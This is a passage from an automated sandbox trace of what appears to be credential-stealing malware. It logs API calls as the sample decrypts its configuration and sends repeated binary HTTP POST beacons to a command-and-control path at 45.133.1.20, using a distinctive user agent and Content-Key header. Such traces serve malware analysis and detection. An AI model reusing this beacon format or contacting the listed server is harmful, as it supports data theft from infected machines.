(in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0170.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.966] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.968] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.968] GetProcessHeap () returned 0x6a0000 [0170.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0170.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.969] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0170.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.971] CryptDestroyKey (hKey=0x6ad560) returned 1 [0170.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.972] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0170.972] GetProcessHeap () returned 0x6a0000 [0170.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0170.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.974] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0170.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.975] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0170.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.976] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0170.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.977] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0170.977] GetProcessHeap () returned 0x6a0000 [0170.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0170.977] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf6c0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be910*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0170.978] GetProcessHeap () returned 0x6a0000 [0170.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0170.978] socket (af=2, type=1, protocol=6) returned 0x350 [0170.978] connect (s=0x350, name=0x6be910*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0171.002] FreeAddrInfoW (pAddrInfo=0x6bf6c0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be910*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0171.002] GetProcessHeap () returned 0x6a0000 [0171.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0171.002] GetProcessHeap () returned 0x6a0000 [0171.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0171.003] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0171.004] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0171.004] GetProcessHeap () returned 0x6a0000 [0171.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0171.004] GetProcessHeap () returned 0x6a0000 [0171.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0171.006] GetProcessHeap () returned 0x6a0000 [0171.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0171.006] GetProcessHeap () returned 0x6a0000 [0171.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0171.006] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0171.007] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0171.007] GetProcessHeap () returned 0x6a0000 [0171.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0171.007] GetProcessHeap () returned 0x6a0000 [0171.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0171.008] send (s=0x350, buf=0x6bbd20*, len=242, flags=0) returned 242 [0171.008] send (s=0x350, buf=0x6bb998*, len=159, flags=0) returned 159 [0171.009] GetProcessHeap () returned 0x6a0000 [0171.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0171.009] recv (in: s=0x350, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0171.100] GetProcessHeap () returned 0x6a0000 [0171.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0171.101] GetProcessHeap () returned 0x6a0000 [0171.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0171.101] GetProcessHeap () returned 0x6a0000 [0171.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0171.102] GetProcessHeap () returned 0x6a0000 [0171.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0171.102] closesocket (s=0x350) returned 0 [0171.103] GetProcessHeap () returned 0x6a0000 [0171.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0171.103] GetProcessHeap () returned 0x6a0000 [0171.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0171.103] GetProcessHeap () returned 0x6a0000 [0171.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0171.104] GetProcessHeap () returned 0x6a0000 [0171.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0171.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc5c) returned 0x350 [0171.106] Sleep (dwMilliseconds=0xea60) [0171.108] GetProcessHeap () returned 0x6a0000 [0171.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0171.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.109] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0171.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.114] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0171.254] GetProcessHeap () returned 0x6a0000 [0171.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0171.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.302] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0171.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.303] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0171.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.304] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.304] GetProcessHeap () returned 0x6a0000 [0171.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0171.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.307] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0171.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.308] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0171.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.309] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0171.309] GetProcessHeap () returned 0x6a0000 [0171.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0171.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.311] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0171.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.312] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0171.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.313] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0171.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.314] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0171.314] GetProcessHeap () returned 0x6a0000 [0171.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0171.314] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0171.314] GetProcessHeap () returned 0x6a0000 [0171.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0171.315] GetProcessHeap () returned 0x6a0000 [0171.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0171.316] GetProcessHeap () returned 0x6a0000 [0171.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0171.316] GetProcessHeap () returned 0x6a0000 [0171.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0171.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.320] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0171.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.328] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0171.344] GetProcessHeap () returned 0x6a0000 [0171.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0171.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.345] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0171.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.346] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0171.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.353] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.353] GetProcessHeap () returned 0x6a0000 [0171.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0171.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.358] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0171.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.359] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0171.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.360] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0171.360] GetProcessHeap () returned 0x6a0000 [0171.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0171.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.362] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0171.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.363] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0171.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.365] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0171.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.366] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0171.366] GetProcessHeap () returned 0x6a0000 [0171.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0171.366] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf8a0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0171.366] GetProcessHeap () returned 0x6a0000 [0171.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0171.366] socket (af=2, type=1, protocol=6) returned 0x354 [0171.367] connect (s=0x354, name=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0171.392] FreeAddrInfoW (pAddrInfo=0x6bf8a0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0171.392] GetProcessHeap () returned 0x6a0000 [0171.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0171.393] GetProcessHeap () returned 0x6a0000 [0171.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0171.393] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0171.396] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0171.396] GetProcessHeap () returned 0x6a0000 [0171.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0171.396] GetProcessHeap () returned 0x6a0000 [0171.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0171.397] GetProcessHeap () returned 0x6a0000 [0171.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0171.397] GetProcessHeap () returned 0x6a0000 [0171.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0171.398] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0171.399] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0171.399] GetProcessHeap () returned 0x6a0000 [0171.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0171.399] GetProcessHeap () returned 0x6a0000 [0171.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0171.400] send (s=0x354, buf=0x6bbd20*, len=242, flags=0) returned 242 [0171.400] send (s=0x354, buf=0x6bb998*, len=159, flags=0) returned 159 [0171.401] GetProcessHeap () returned 0x6a0000 [0171.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0171.401] recv (in: s=0x354, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0171.470] GetProcessHeap () returned 0x6a0000 [0171.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0171.472] GetProcessHeap () returned 0x6a0000 [0171.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0171.473] GetProcessHeap () returned 0x6a0000 [0171.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0171.473] GetProcessHeap () returned 0x6a0000 [0171.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0171.474] closesocket (s=0x354) returned 0 [0171.475] GetProcessHeap () returned 0x6a0000 [0171.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0171.475] GetProcessHeap () returned 0x6a0000 [0171.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0171.476] GetProcessHeap () returned 0x6a0000 [0171.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0171.477] GetProcessHeap () returned 0x6a0000 [0171.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0171.477] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12dc) returned 0x354 [0171.480] Sleep (dwMilliseconds=0xea60) [0171.482] GetProcessHeap () returned 0x6a0000 [0171.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0171.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.483] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0171.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.490] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0171.500] GetProcessHeap () returned 0x6a0000 [0171.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6ae8 [0171.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.501] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b6ae8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0171.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.503] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0171.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.504] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.504] GetProcessHeap () returned 0x6a0000 [0171.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ae8 | out: hHeap=0x6a0000) returned 1 [0171.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.506] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0171.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.561] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0171.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.564] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0171.564] GetProcessHeap () returned 0x6a0000 [0171.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0171.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.565] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0171.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.566] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0171.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.567] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0171.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.568] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0171.568] GetProcessHeap () returned 0x6a0000 [0171.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0171.569] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0171.569] GetProcessHeap () returned 0x6a0000 [0171.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0171.570] GetProcessHeap () returned 0x6a0000 [0171.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0171.571] GetProcessHeap () returned 0x6a0000 [0171.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0171.573] GetProcessHeap () returned 0x6a0000 [0171.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0171.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.574] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0171.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.585] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0171.594] GetProcessHeap () returned 0x6a0000 [0171.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0171.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.595] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0171.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.597] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0171.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.598] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.598] GetProcessHeap () returned 0x6a0000 [0171.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0171.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.599] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, 